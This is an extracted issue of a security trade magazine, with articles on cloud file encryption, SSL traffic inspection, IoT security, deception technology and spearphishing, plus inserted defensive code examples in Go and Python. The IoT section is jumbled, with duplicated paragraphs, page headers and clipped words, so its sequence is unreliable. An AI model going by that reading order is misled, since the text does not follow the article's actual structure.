File-level encryption, on the other hand, protects the data itself (rather than just the place it’s stored) before it ever reaches the cloud. This means that files will remain encrypted wherever they go, including mobile devices, and only authorised users will be able to retrieve them. Deploying this kind of encryption to bolster cloud providers’ default precautions is paramount for keeping financial information, personal data, and intellectual property secure, particularly in a workplace that encourages BYOD or where team members work remotely or on the go.

Deploy a cloud access security broker (CASB). Currently, only five percent of businesses use a CASB, but reports have predicted that usage will skyrocket to 85 percent by 2020. A CASB provides a unified security solution that lets team administrators detect data loss risks, deploy protections, and enforce security protocols all in one place. A CASB will also let employees continue using the cloud providers they’re already used to, but will grant administrators the necessary outlet for monitoring how files are being shared.

A CASB doesn’t let data slip through the cracks; it establishes strong visibility, a must for knowing exactly where sensitive content is being stored and with whom it’s being shared. As data continues proliferating throughout the cloud, more and more businesses will start using CASBs to keep up with the information and more effectively guarantee its protection.

Separate the encrypted content from the keys. When the encryption keys are kept separately from the content, a hacker who obtains the content won’t be able to read it without the keys. Deploy a solution that ensures this separation, allowing your IT department to practise good security hygiene. This way, even if your cloud provider is compromised, your data is less likely to be breached.
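The two measures above, file-level encryption before upload and keeping the keys away from the content, fit together in one small model. The following Go program is an added example and is not Sookasa’s product code or anything from the article; the per-file AES-256-GCM data key, the two map-backed stores and the constructed sample files are assumptions made for illustration. It walks through the cases the article worries about: an authorised user with access to both stores, a provider that holds only ciphertext, and a lost device whose key belongs to a different file.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"errors"
	"fmt"
)

// Added example (not Sookasa's code). Each file is sealed on the client
// with its own random AES-256-GCM key; the "cloud" only ever holds
// ciphertext and the key store only ever holds keys, so compromising one
// store alone yields no plaintext. The file name is bound in as associated
// data so a ciphertext cannot be quietly moved under another name.

// EncryptedFile is what gets synced to the provider and to mobile devices.
type EncryptedFile struct {
	Nonce      []byte
	Ciphertext []byte
}

// CloudStore stands in for the provider's storage; KeyStore for the
// separately held key service controlled by the organisation (assumed).
type CloudStore map[string]EncryptedFile
type KeyStore map[string][]byte

// EncryptFile generates a fresh data key, seals the plaintext and places
// ciphertext and key in their separate stores.
func EncryptFile(name string, plaintext []byte, cloud CloudStore, keys KeyStore) error {
	key := make([]byte, 32) // AES-256
	if _, err := rand.Read(key); err != nil {
		return err
	}
	gcm, err := newGCM(key)
	if err != nil {
		return err
	}
	nonce := make([]byte, gcm.NonceSize())
	if _, err := rand.Read(nonce); err != nil {
		return err
	}
	cloud[name] = EncryptedFile{Nonce: nonce, Ciphertext: gcm.Seal(nil, nonce, plaintext, []byte(name))}
	keys[name] = key
	return nil
}

// DecryptFile fails unless both the ciphertext and the matching key are
// present and the GCM authentication tag verifies.
func DecryptFile(name string, cloud CloudStore, keys KeyStore) ([]byte, error) {
	ef, ok := cloud[name]
	if !ok {
		return nil, errors.New("no ciphertext for " + name)
	}
	key, ok := keys[name]
	if !ok {
		return nil, errors.New("no key for " + name)
	}
	gcm, err := newGCM(key)
	if err != nil {
		return nil, err
	}
	return gcm.Open(nil, ef.Nonce, ef.Ciphertext, []byte(name))
}

func newGCM(key []byte) (cipher.AEAD, error) {
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	return cipher.NewGCM(block)
}

// Scenario reports the outcome of each case the article is concerned with.
type Scenario struct {
	Roundtrip           bool // authorised user with both stores gets the file back
	CloudHoldsPlaintext bool // provider storage contains the plaintext bytes
	CloudOnlyFails      bool // provider compromise: ciphertext but no keys
	WrongKeyFails       bool // lost device carrying a key for a different file
}

// RunScenario uses constructed sample files; no real data is involved.
func RunScenario() (Scenario, error) {
	var sc Scenario
	cloud, keys := CloudStore{}, KeyStore{}
	secret := []byte("constructed sample: Q1 payroll, account 0000-1111")
	if err := EncryptFile("payroll.xlsx", secret, cloud, keys); err != nil {
		return sc, err
	}
	if err := EncryptFile("lunch-menu.txt", []byte("constructed sample: soup"), cloud, keys); err != nil {
		return sc, err
	}
	got, err := DecryptFile("payroll.xlsx", cloud, keys)
	sc.Roundtrip = err == nil && bytes.Equal(got, secret)
	sc.CloudHoldsPlaintext = bytes.Contains(cloud["payroll.xlsx"].Ciphertext, secret)
	_, err = DecryptFile("payroll.xlsx", cloud, KeyStore{})
	sc.CloudOnlyFails = err != nil
	_, err = DecryptFile("payroll.xlsx", cloud, KeyStore{"payroll.xlsx": keys["lunch-menu.txt"]})
	sc.WrongKeyFails = err != nil
	return sc, nil
}

func main() {
	sc, err := RunScenario()
	if err != nil {
		panic(err)
	}
	fmt.Printf("%+v\n", sc)
}
```

A real deployment would wrap each per-file key with a master key held in an HSM or key management service rather than keeping raw keys in a map, but the separation property is the same: whoever holds the synced folder or the provider’s buckets holds nothing readable.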

The cloud is quickly becoming a necessity for businesses to keep up with today’s workflow. But simply deploying cloud solutions is not enough. Businesses have to do their research and find the right enhancements that will adequately bolster their default security protocols. File-level encryption, CASBs, and content-key separation are a great place to start to ensure that your most sensitive files stay secure.


OPINION

LET’S ENCRYPT AND DECRYPT

Paul Nicholson, Director, Product Marketing, A10 Networks, discusses why organisations need a dedicated SSL inspection platform to eliminate potential blind spots in their respective cyber defences.

Ever since Edward Snowden’s revelations in 2013, SSL encryption has become all the rage with application owners, and that, in turn, has led to the rise of attacks hiding in SSL traffic. What’s more, movements like ‘Let’s Encrypt,’ the free, automated and open certificate authority (CA) provided by the Internet Security Research Group (ISRG), have inadvertently created a new set of vulnerabilities. Attackers are able to exploit Let’s Encrypt to generate their own seemingly legitimate SSL certificates to sign malicious code or to host malicious HTTPS sites.

Encryption allows hackers to conceal their exploits from security devices like firewalls, intrusion prevention systems and data loss prevention platforms. Some of these products cannot decrypt SSL traffic without degrading performance, while others simply cannot decrypt SSL traffic because of their location in the network.

To counter the threat posed by SSL encryption, organisations need to decrypt and inspect inbound and outbound traffic with a dedicated SSL inspection platform that enables third-party security devices to eliminate the blind spot in corporate defences. Let’s look at three ways malware developers use encryption to escape detection:

Zeus Trojan. First identified in 2007, the Zeus Trojan is one of the many types of malware that incorporate encryption. It continues to be one of the most prevalent and dangerous pieces of financial malware around, responsible for compromising approximately four million PCs in the US as of December 2014. The Zeus attack toolkit is widely used by countless criminal groups, enabling them to develop variants that are even more sophisticated. This led to the formation of the Gameover Zeus botnet, which leverages encrypted peer-to-peer communication for both malware distribution and command and control (C&C) communications. The FBI estimates that Gameover Zeus has been responsible for the theft of more than $100 million.

Command and control updates from social media sites. Some new malware strains use social networks, such as Twitter and Facebook, and Web-based email for command and control communications. For instance, malware can receive C&C commands from Twitter accounts or comments on Pinterest, which encrypt all communications. To detect these botnet threats, organisations need to decrypt and inspect SSL traffic, otherwise security analysts might view client machine access to social media sites as harmless.

Remote Access Trojan (RAT). G Data Software, a German security research firm, discovered a remote access Trojan (RAT) they named Win32.Trojan.IcoScript.A receiving C&C commands through Yahoo Mail. Since then, G Data, as well as consultants at Shape Security, have discovered additional IcoScript strains receiving C&C updates from Gmail draft messages. One form of the malware works by using a Python script to retrieve commands and other code from the drafts folder, which stays hidden despite being open. With both Gmail and Yahoo Mail encrypting traffic, malware is able to use them to evade detection by IDS or DLP solutions. If organisations don’t decrypt and inspect traffic to email sites, they’re raising their risk of infection from these types of malware.

Encryption today accounts for roughly one-third of all Internet traffic, and it’s expected to reach two-thirds of all traffic next year when Internet powerhouses like Netflix transition to SSL. As a result, encrypted traffic will simply become the ‘go-to’ way of distributing malware and executing cyber-attacks. To detect malicious activity, organisations should decrypt and inspect SSL traffic. Otherwise, malware could be passing them by.

To solve this issue and gain SSL insight, organisations can deploy SSL inspection platforms to decrypt SSL traffic and forward it to third-party security devices for analysis. For outbound traffic, organisations own the end points but not the SSL certificates and keys. An SSL inspection platform can decrypt traffic when configured as a transparent forward proxy or an explicit proxy.

Decrypting inbound traffic destined to internal application servers is different from decrypting outbound traffic because organisations own the SSL keys. There are two main ways to decrypt inbound SSL traffic sent to internal servers:

Reverse proxy mode: SSL traffic is terminated on the SSL inspection device and sent in clear text to inline or non-inline security devices. This mode is also referred to as ‘SSL Offload.’

Passive non-inline or inline mode: SSL traffic is decrypted using a copy of the server SSL keys. SSL traffic is not modified by the SSL inspection platform except, potentially, to block attacks.

In passive non-inline mode, the SSL inspection platform can be installed transparently without needing to update network settings. However, organisations won’t be able to effectively block all attacks, including single-packet attacks. The biggest flaw, however, is that passive mode fails to support strong encryption methods like Perfect Forward Secrecy (PFS) because the SSL inspection platform does not actively participate in the SSL key negotiation.

Whether sharing a malicious file on a social networking site or attaching malware to an email or instant message, many attacks will be cloaked in SSL. It’s time organisations invest heavily in data protection and don’t forget to decrypt and inspect all SSL traffic.
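Even where the bodies of HTTPS sessions to a webmail site cannot be read, the proxy or firewall still records who connected where and when, and malware polling a mailbox for C&C updates on a timer leaves a very regular pattern in that metadata. The following Go program is an added example, not A10 Networks’ product code or anything from the article: it flags (client, host) pairs whose connection intervals barely vary. The log format, the thresholds and the log lines themselves are constructed for illustration; the webmail hostname is a placeholder. This is a heuristic to triage what to inspect, not a replacement for the decryption the article calls for.

```go
package main

import (
	"fmt"
	"math"
	"sort"
	"strings"
	"time"
)

// Added example (not A10's code): beacon-like connection detection over
// proxy metadata, for the case where session contents are encrypted.

// LogEntry is one proxy CONNECT record: timestamp, client, destination host.
type LogEntry struct {
	At     time.Time
	Client string
	Host   string
}

// ParseProxyLog reads lines of the assumed form "<RFC3339 time> <client> <host>".
// Malformed lines are skipped rather than aborting the batch.
func ParseProxyLog(raw string) []LogEntry {
	var out []LogEntry
	for _, line := range strings.Split(strings.TrimSpace(raw), "\n") {
		f := strings.Fields(line)
		if len(f) != 3 {
			continue
		}
		t, err := time.Parse(time.RFC3339, f[0])
		if err != nil {
			continue
		}
		out = append(out, LogEntry{At: t, Client: f[1], Host: f[2]})
	}
	return out
}

// FindBeacons returns "client -> host" pairs with at least minConns
// connections whose inter-connection intervals vary by less than maxJitter
// (coefficient of variation, stddev / mean). Sorted for stable output.
func FindBeacons(entries []LogEntry, minConns int, maxJitter float64) []string {
	byPair := map[string][]time.Time{}
	for _, e := range entries {
		k := e.Client + " -> " + e.Host
		byPair[k] = append(byPair[k], e.At)
	}
	var flagged []string
	for k, ts := range byPair {
		if len(ts) < minConns {
			continue
		}
		sort.Slice(ts, func(i, j int) bool { return ts[i].Before(ts[j]) })
		var gaps []float64
		for i := 1; i < len(ts); i++ {
			gaps = append(gaps, ts[i].Sub(ts[i-1]).Seconds())
		}
		mean, sd := meanStddev(gaps)
		if mean > 0 && sd/mean < maxJitter {
			flagged = append(flagged, k)
		}
	}
	sort.Strings(flagged)
	return flagged
}

func meanStddev(xs []float64) (float64, float64) {
	var sum float64
	for _, x := range xs {
		sum += x
	}
	mean := sum / float64(len(xs))
	var sq float64
	for _, x := range xs {
		sq += (x - mean) * (x - mean)
	}
	return mean, math.Sqrt(sq / float64(len(xs)))
}

// SampleLog is constructed data: 10.1.2.3 polls the webmail host every five
// minutes with a few seconds of jitter; 10.1.2.4 visits it at irregular,
// human-looking times. One malformed line checks the parser's tolerance.
const SampleLog = `
2016-03-01T09:00:00Z 10.1.2.3 mail.example-webmail.com
2016-03-01T09:05:02Z 10.1.2.3 mail.example-webmail.com
2016-03-01T09:09:59Z 10.1.2.3 mail.example-webmail.com
2016-03-01T09:15:01Z 10.1.2.3 mail.example-webmail.com
2016-03-01T09:20:00Z 10.1.2.3 mail.example-webmail.com
2016-03-01T09:24:58Z 10.1.2.3 mail.example-webmail.com
2016-03-01T08:41:10Z 10.1.2.4 mail.example-webmail.com
2016-03-01T09:03:27Z 10.1.2.4 mail.example-webmail.com
2016-03-01T09:04:02Z 10.1.2.4 mail.example-webmail.com
2016-03-01T09:52:48Z 10.1.2.4 mail.example-webmail.com
2016-03-01T11:20:15Z 10.1.2.4 mail.example-webmail.com
2016-03-01T11:21:00Z 10.1.2.4 mail.example-webmail.com
not a valid line
`

func main() {
	for _, pair := range FindBeacons(ParseProxyLog(SampleLog), 5, 0.05) {
		fmt.Println("beacon-like:", pair)
	}
}
```

Legitimate software also polls on timers (mail clients, update checks), so a hit is a reason to route that pair through the inspection platform and look at the decrypted content, not a verdict on its own.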
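The point about passive mode and Perfect Forward Secrecy can be made concrete. The following Go program is an added illustration, not A10 Networks’ product code or anything from the article: it models the two key exchanges in miniature and asks what a passive observer holding only a copy of the server’s long-term private key can recover. With RSA key exchange, the client encrypts the pre-master secret to the server’s static key, so a copy of that key decrypts it. With ECDHE (modelled here with X25519), both ends use one-time ephemeral keys and the static key never enters the secret; the best the observer can do is combine the static key with what was on the wire, which yields an unrelated value. Signatures, transcripts and key derivation are omitted as an assumption to keep the comparison short.

```go
package main

import (
	"bytes"
	"crypto/ecdh"
	"crypto/rand"
	"crypto/rsa"
	"crypto/sha256"
	"fmt"
)

// Added illustration (not A10's code) of why a passive inspection device with
// a copy of the server key handles RSA key exchange but not (EC)DHE.

// Result records whether each party ended up with the real session secret.
type Result struct {
	RSAObserverRecovers   bool // passive observer with a copy of the static RSA key
	ECDHEEndpointsAgree   bool // client and server derive the same secret
	ECDHEObserverRecovers bool // passive observer with a copy of the static ECDH key
}

// rsaExchange models TLS RSA key exchange: the client encrypts a random
// pre-master secret to the server's static public key. Anyone holding the
// private key, the server or an observer with a copy, recovers it.
func rsaExchange(serverKey *rsa.PrivateKey) ([]byte, []byte, []byte, error) {
	premaster := make([]byte, 32)
	if _, err := rand.Read(premaster); err != nil {
		return nil, nil, nil, err
	}
	// wire is the only thing visible on the network
	wire, err := rsa.EncryptOAEP(sha256.New(), rand.Reader, &serverKey.PublicKey, premaster, nil)
	if err != nil {
		return nil, nil, nil, err
	}
	server, err := rsa.DecryptOAEP(sha256.New(), nil, serverKey, wire, nil)
	if err != nil {
		return nil, nil, nil, err
	}
	observer, err := rsa.DecryptOAEP(sha256.New(), nil, serverKey, wire, nil)
	if err != nil {
		return nil, nil, nil, err
	}
	return premaster, server, observer, nil
}

// ecdheExchange models (EC)DHE: both ends use fresh ephemeral keys, so the
// secret depends on scalars that never leave the endpoints. The observer can
// only combine the static key with the public shares it saw on the wire.
func ecdheExchange(serverStatic *ecdh.PrivateKey) ([]byte, []byte, []byte, error) {
	curve := ecdh.X25519()
	clientEph, err := curve.GenerateKey(rand.Reader)
	if err != nil {
		return nil, nil, nil, err
	}
	serverEph, err := curve.GenerateKey(rand.Reader)
	if err != nil {
		return nil, nil, nil, err
	}
	// on the wire: clientEph.PublicKey() and serverEph.PublicKey() only
	client, err := clientEph.ECDH(serverEph.PublicKey())
	if err != nil {
		return nil, nil, nil, err
	}
	server, err := serverEph.ECDH(clientEph.PublicKey())
	if err != nil {
		return nil, nil, nil, err
	}
	observer, err := serverStatic.ECDH(clientEph.PublicKey())
	if err != nil {
		return nil, nil, nil, err
	}
	return client, server, observer, nil
}

// CompareExchanges runs both models with freshly generated keys.
func CompareExchanges() (Result, error) {
	var r Result
	rsaKey, err := rsa.GenerateKey(rand.Reader, 2048)
	if err != nil {
		return r, err
	}
	c, s, o, err := rsaExchange(rsaKey)
	if err != nil {
		return r, err
	}
	r.RSAObserverRecovers = bytes.Equal(c, s) && bytes.Equal(o, s)

	static, err := ecdh.X25519().GenerateKey(rand.Reader)
	if err != nil {
		return r, err
	}
	c, s, o, err = ecdheExchange(static)
	if err != nil {
		return r, err
	}
	r.ECDHEEndpointsAgree = bytes.Equal(c, s)
	r.ECDHEObserverRecovers = bytes.Equal(o, s)
	return r, nil
}

func main() {
	r, err := CompareExchanges()
	if err != nil {
		panic(err)
	}
	fmt.Printf("RSA key exchange: observer with static key recovers secret = %v\n", r.RSAObserverRecovers)
	fmt.Printf("ECDHE: endpoints agree = %v, observer with static key recovers secret = %v\n",
		r.ECDHEEndpointsAgree, r.ECDHEObserverRecovers)
}
```

This is why an inspection device that must see PFS traffic has to sit inline and terminate the session itself (the reverse proxy mode above): it then takes part in the ephemeral exchange instead of watching it.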


g

Ways to secure connected devices before it’s too late.

INSIghT

artner researchers predict that by 2020 we will have 25 billion connected devices.

Meanwhile, PricewaterhouseCoopers’ Global State of Information Security Survey 2015 says that more than 70 percent of connected IoT devices, such as baby monitors, home thermostats, and televisions, are vulnerable because they lack fundamental security safeguards.

Jan Schreuder, Partner, PwC Switzerland, shared his opinion, “The Internet of Things is about much more than just ‘things’ - it is about recording every piece of data about every element of our physical lives in addition to our digital lives. Just as product safety standards and regulations have evolved to protect consumers’ physical safety, it will have to evolve quickly to protect our digital safety“.

According to Gartner analysts, machines will replace human decision-making in the near future. If vulnerable machines will indeed replace humans – then humanity will disappear pretty quickly. The biggest practical risks for non-critical connected devices are probably large-scale untargeted attacks launched ‘for fun,’ like Morris worm, causing great inconveniences for the society. However, a large-scale attack

SECuRINg ThE INTERNET Of ThINgS

24 03.2016 www.securityadvisorme.com

Page 25: Security Advisor Middle East | Issue 3

and holistic assessments applicable to externally exposed devices.

Secondly, we should always try to segregate computer systems of smart devices into two separate parts: core and connectable. The first one is responsible for mission-critical functionality (such as brakes in the car or power management in a fridge), while the second one receives all necessary data from the first one, handles and sends it [if necessary] to the Internet. Since 1988, when the Morris worm made the headlines, nothing really changed in the basics of computer security: user-supplied input is the biggest evil.

Initially represented by simple buffer overflows, then heap, integer and format string flaws, in early 2000 by PHP includes, then by SQL injections and XSS. Today, we rather talk about

chained web attacks and DOM-based XSS vulnerabilities, but all these flaws have one thing in common – they are all triggered by malicious user input. Therefore, the core system should ideally not accept any input that a remote user can provide or alter.

Thirdly, connected devices should be easily resettable on a hardware level. A firmware should be reinstalled from scratch with default factory settings by pressing a single button on a device. This will enable IoT device owners to quickly recover from various attacks and malware infections once they occur. Otherwise, we will spend billions on IoT antiviruses throwing money down the drain.

Fourthly, connected device manufacturers need to be financially

liable for negligence in their firmware code and architecture. Yes, we cannot sue software developers for every single bug in the code, but obliging them to respect secure coding standards and security best-practices, implement an obligatory code review before deployment as a part of SDLC – are must have. This is a relatively new trend, but it’s starting to make more and more buzz attracting new supporters from all over the world. This approach is quite reasonable – if a toy manufacturer uses toxic plastic – he will be fined and sanctioned very quickly, so why shouldn’t the same responsibility apply for negligence in software development?

Last, but not least, IoT device manufacturers should make available to consumers which data from the

INSIGHT

on medical devices can kill thousands of people all over the world.

The simplest and most efficient solution that comes to mind is to avoid connecting objects to the Internet that do not really require an Internet connection. I grew up without a smart coffee machine and without a remotely manageable fridge, and I feel just fine without them now. But a weak economy pushes enterprises to innovate by all possible means in order to remain competitive, and many companies simply follow a market trend such as Internet connectivity, creating unnecessary and even dangerous new features in their products.

Nevertheless, nobody can overcome a basic law of economics: consumption creates demand. While non-technical parents, guided by aggressive marketing campaigns, buy vulnerable smart Barbies for their kids, production of vulnerable IoT devices will keep growing, regardless of the consequences for consumers. Moreover, in some industries connected devices really are necessary to increase efficiency and quality of production.

For economic reasons we cannot stop the expansion of connected devices, so we need to work out how to secure them. Practically speaking, nobody but the manufacturers (vendors) can make connected devices secure. Below are five basic security measures they should undertake.

First, manufacturers of connected devices should treat any LAN as a hostile environment, just like the Internet. Many companies still think that if a device is not directly accessible from the Internet, nobody needs to be concerned about its security. Today, even the largest security companies tend to ignore risks on the LAN, developing their products as if hackers would never probe them. That concept is totally wrong. Given the growing quantity and quality of mobile malware, combined with highly sophisticated and almost undetectable backdoors for PCs, the LAN has become an untrustworthy network segment and should be subject to all the same security best practices as Internet-facing systems.

Secondly, we should always try to segregate the computer systems of smart devices into two separate parts: core and connectable.

device they handle or store, and explain how to deactivate any functions that receive or send any data to the Internet. Some data, innocent at first glance, such as how many cups of coffee you consume per day, can be very valuable to health insurance companies and may be used against you. And even if the manufacturer only processes this data through its own cloud, the company should still tell customers about it, because if the manufacturer is compromised, attackers will easily intercept and steal the data.

As we can see from the above, just by respecting some common-sense rules and information security best practices, IoT vendors can assure a secure future for the connected devices around us. Will they?

03.2016 | 25 | www.securityadvisorme.com

Page 26: Security Advisor Middle East | Issue 3


OFFENSIVE SECURITY

Carolyn Crandall, CMO, Attivo Networks, discusses how security teams can gain the upper hand by going on the offense and creating an environment that provides continuous real-time detection against an ever-changing landscape of cyber threats.

INSIGHT

Deception as a strategy has been used for years in war and, notably, by cyber attackers. Using deception to address threats that have already bypassed traditional prevention controls is, however, an emerging and additional line of defence. Today's deception-based technology abandons the reliance on known attack patterns and monitoring and instead uses luring techniques and engagement servers to entice an attacker away from valuable company servers.

According to the Ponemon Institute, it takes 46 days, on average, to fully resolve an attack once it has been discovered. Deception, on the other hand, can detect attackers at several phases of the kill chain, giving defenders a chance to stop them before the attack is completed.

To understand deception and decoy technologies, it’s important to understand the terms security teams, security solution providers, industry analysts, editors and others use, and sometimes misuse. Key terms include:

kill chain cycle – a definition of the steps taken within a cyber-attack, which includes: 1) reconnaissance 2) initial compromise 3) establishing a foothold 4) escalating privileges 5) internal reconnaissance 6) moving laterally 7) maintaining presence 8) continuing to escalate privileges until the attacker completes their mission.

honeypot – a server, computer or network that appears to be an integral part of an organisation's network, but is in reality bait for hackers. The IT or security team installs honeypot software on these devices and connects them to the network. Attackers scanning the network for weaknesses will find them and attempt to break in. Because no legitimate user or process has any reason to touch a honeypot, any interaction with it is suspicious by definition: when an intruder breaks in, finds nothing of value and tries to run malware or move on, every step is recorded for the defenders.

honeynet – a honeynet is simply two or more honeypots on a network. IT and security teams deploy honeynets to protect larger networks or networks containing diverse types of information. Honeypots and honeynets were among the first deception-based technologies used by IT and security teams. These solutions are generally based on emulating an environment and, without regular updates, may be recognised and detected by an attacker over time. Lack of a central management UI adds to the operational cost and complexity of managing these solutions.

deception engagement servers – deception techniques are similar to a honeynet in their use of engagement servers to lure an attacker into a trap. However, with deception, endpoint lures and distributed engagement servers are used to actively attract an attacker. In addition to real-time detection, advanced solutions will provide the ability to communicate with the attacker's command and control infrastructure, along with the forensics required to update prevention systems and shut down attacks. Advances in technology have also made deception solutions non-disruptive to deploy and not resource-intensive to manage. A comprehensive deception platform will be scalable and take a "deception everywhere" approach, supporting user networks and data centres across private, public and hybrid cloud environments. Some refer to a deception engagement server as a honeynet on steroids.

deception credentials – These are the lures placed on endpoint devices that work dynamically with deception engagement servers to actively draw attackers away from the enterprise’s servers and get them instead to engage with the deception engagement server.


Engagement or deception servers – deception providers use high-interaction engagement servers that will lure, trap, and analyse an attack. Engagement or deception servers run real or emulated operating systems and services, support virtualisation, and can be customised for layer two to layer seven deceptions. They can be located in a private data centre as well as in private, hybrid and public clouds. In addition, they have a self-healing environment which, after containing and analysing an infection, can safely destroy the infected VM and rebuild itself for the next attack. Mature platforms will also have the ability to engage with C&C servers so that additional data about the attacker's methods and intent can be gathered.

Emulation – this uses best efforts to copy an environment to deceive an attacker into engaging. Since emulation is a thin copy, it cannot exactly match the operating systems and services the organisation actually runs. Given their static nature, emulated decoys can be easier for an attacker to detect.

Real operating systems – real operating systems and services provide significantly better authenticity over emulation solutions because they use active licenced software that is loaded on the engagement server. These solutions can be customised by turning on or off operating systems and services to match a company’s environment. Solutions that allow the loading of a company ‘golden image’ provide an environment that is virtually indistinguishable from company servers. Maintenance of these operating systems and services is provided by the deception manufacturer under a standard support agreement. There should not be additional costs or resources required to maintain this software.

friction-less (non-disruptive deployment and management) – deception solutions should integrate seamlessly with existing security infrastructure and should play an active role in an organisation's continuous defence strategy by enabling real-time threat detection. By design, they should not require signature or database look-ups, changes to network topology or traffic, or heavy computation to detect an attack.

Threat intelligence – when a bot or APT engages a decoy, the solution should run full forensics to capture the methods and intent of the attacker. It should include a threat intelligence dashboard and a full range of indicator of compromise (IOC) reports to enable prevention systems to shut down current attacks and prevent future ones.

false positives – many monitoring systems will trigger an alert based on what may be bot or APT activity. These solutions tend to generate a high volume of alerts that often are not an attack at all. Deception solutions produce very few false positives, since they only alert on actual engagement with the deception platform, which no legitimate user has any reason to touch. The residual noise is predictable and easy to exclude: vulnerability scanners, asset-discovery tools and misconfigured clients that happen to probe a decoy. Advanced systems will provide the option to set alerts at low, medium or high for additional customisation.
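The definitions of deception credentials and honeypots above, and the false-positive point just made, come down to one rule: nobody legitimate ever uses a planted credential or talks to a decoy host, so contact with either is the alert. The following is an added example, not code from the original article or from Attivo Networks. It assumes two constructed log formats (an authentication line and a connection line), hypothetical decoy account names, decoy addresses and a scanner allowlist, and runs over constructed sample lines; the correlation step escalates a source that both probed decoys and then used a harvested credential.

```python
"""Alert on engagement with decoys: planted credentials and decoy hosts.

Added example (not Attivo's or the magazine's code). Names, addresses and the
two log formats below are constructed for illustration.
"""
import re
from dataclasses import dataclass

# What the deception layer planted (hypothetical inventory).
DECOY_ACCOUNTS = {"svc_backup_admin", "sql_ro_legacy"}   # deception credentials on endpoints
DECOY_HOSTS = {"10.10.5.240", "10.10.5.241"}             # engagement servers
# Systems that legitimately sweep the whole network (here: a vulnerability
# scanner). Their touches on decoy hosts are expected and are not alerts.
SCANNER_ALLOWLIST = {"10.10.1.15"}

# Constructed log formats assumed for the example:
#   AUTH user=<name> src=<ip> dst=<ip> result=<ok|fail>
#   NET src=<ip> dst=<ip> dport=<port>
AUTH_RE = re.compile(r"^AUTH user=(\S+) src=(\S+) dst=(\S+) result=(\S+)$")
NET_RE = re.compile(r"^NET src=(\S+) dst=(\S+) dport=(\d+)$")


@dataclass(frozen=True)
class Alert:
    severity: str
    reason: str
    src: str
    detail: str


def analyse(lines):
    """Turn raw log lines into alerts. Only contact with a decoy produces one."""
    alerts = []
    for line in lines:
        m = AUTH_RE.match(line.strip())
        if m:
            user, src, dst, result = m.groups()
            # Nobody legitimate knows a planted credential, so any attempt to
            # use it (successful or not) means it was harvested from an endpoint.
            if user in DECOY_ACCOUNTS:
                alerts.append(Alert("high", "decoy credential used", src,
                                    f"{user} -> {dst} ({result})"))
            continue
        m = NET_RE.match(line.strip())
        if m:
            src, dst, dport = m.groups()
            if dst in DECOY_HOSTS and src not in SCANNER_ALLOWLIST:
                alerts.append(Alert("medium", "decoy host touched", src, f"tcp/{dport}"))
    return alerts


def correlate(alerts):
    """Per source: 'critical' if it both probed decoy hosts and used a planted
    credential (internal recon followed by lateral movement), otherwise the
    single reason seen for that source."""
    reasons = {}
    for a in alerts:
        reasons.setdefault(a.src, set()).add(a.reason)
    return {src: ("critical" if len(r) > 1 else next(iter(r))) for src, r in reasons.items()}


# Constructed sample: one real user, one scanner, one intruder on 10.10.2.88.
SAMPLE_LOG = [
    "AUTH user=jdoe src=10.10.2.31 dst=10.10.3.7 result=ok",
    "AUTH user=jdoe src=10.10.2.31 dst=10.10.3.7 result=fail",     # ordinary typo, no alert
    "NET src=10.10.1.15 dst=10.10.5.240 dport=445",               # scanner, allowlisted
    "NET src=10.10.2.88 dst=10.10.5.240 dport=445",               # intruder finds a decoy
    "NET src=10.10.2.88 dst=10.10.5.241 dport=3389",
    "AUTH user=svc_backup_admin src=10.10.2.88 dst=10.10.5.241 result=fail",
]

if __name__ == "__main__":
    found = analyse(SAMPLE_LOG)
    for a in found:
        print(f"[{a.severity}] {a.reason}: {a.src} {a.detail}")
    print(correlate(found))
```

Note what does not alert: the failed logon by a real user, which an ordinary monitoring rule would flag, and the scanner's sweep of a decoy. The allowlist is the one place such a system can still be wrong, so keep it short and review it whenever the scanning estate changes.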

The shift to continuous detection

New deception technologies bring a heightened level of aggressiveness in addressing cyber-attacks. Dynamic deception steps in when prevention systems fail and provides organisations with an efficient way to continuously detect intrusions with high-interaction traps, engagement servers, and luring techniques to engage attackers, all without requiring additional IT staff to manage the solution.

Statistics pointing to the increasing number of threats and the growing sophistication of these threats are in the news every day. Symantec noted in its April 2015 Internet Security Threat Report that attacks on large companies were up 40 percent over the previous year, and Dave DeWalt, FireEye's CEO, stated recently on 60 Minutes, "Literally, 97 percent of all companies have been breached."

According to a recent Ponemon Institute report, the average annualised cost of cybercrime to an organisation has risen to $15 million. With that in mind, corporate management has a responsibility to customers, shareholders, employees and partners to do everything they can to protect critical data and IP assets.

Dynamic deception solutions are a new, powerful weapon in the IT and security team's arsenal for protecting an organisation's most critical assets. Prevention systems have demonstrated that they have gaps and will continue to be unreliable given the porousness of the network perimeter, the sophistication of modern cyber-attacks, the adoption of new technologies and human error.

Deception can play a critical role as the next line of defence for detecting intrusions that have made their way inside the network before an attack can be completed and the damage is done. Breaches can be a costly and time-consuming challenge to deal with. It's time to turn the tables and use deception to outsmart the hackers and to protect your company's assets and brand.


10 REASONS WHY PHISHING ATTACKS ARE NASTIER THAN EVER

Forget Nigerian princes – today’s spearphishing is sophisticated business, fooling even the most seasoned security pros

FEATURE

Phishing emails have been the scourge of the computer world for decades, defeating even our best efforts to combat them. Most of us can easily spot them by their subject lines and delete them without even opening them. If we're not entirely sure and end up opening them, we can immediately identify a phishing attempt by its overly formal greetings, foreign origins, misspellings, and overly solicitous efforts to send us millions of unearned dollars or to sell us dubious products. Most of the time, phishing attempts are a minor menace we solve with the 'delete' key.

Enter spearphishing – a targeted approach to phishing that is proving nefariously effective, even against the most seasoned security pros. Why? Because they are crafted by thoughtful professionals who seem to know your business, your current projects and your interests. They don’t tip their hand by trying to sell you anything or claiming to have money to give away. In fact, today’s spearphishing attempts have far more sinister goals than simple financial theft.

Here’s a look at what sets today’s most sophisticated spearphishing attempts apart -- and how to keep from falling prey to their advances.

The attack is handcrafted by professional criminals

Traditionally, phishing emails have been created by low-end scammers who opted for the buckshot approach: putting together a sloppy message and spamming it en masse. You're bound to get someone. In fact, the more obvious the phishing attempt, the better, as this ensures ensnaring only the most gullible of victims.

Somewhere along the way this changed. Professional and organised criminals realised that a lot of money could be made by sending out better spam messages. Brian Krebs' 2014 bestseller 'Spam Nation' traces the rise of professional criminal gangs in Russia that made tens of millions of dollars each year and supported multiple large companies, some of which pretended to be legitimate and were traded on stock exchanges.

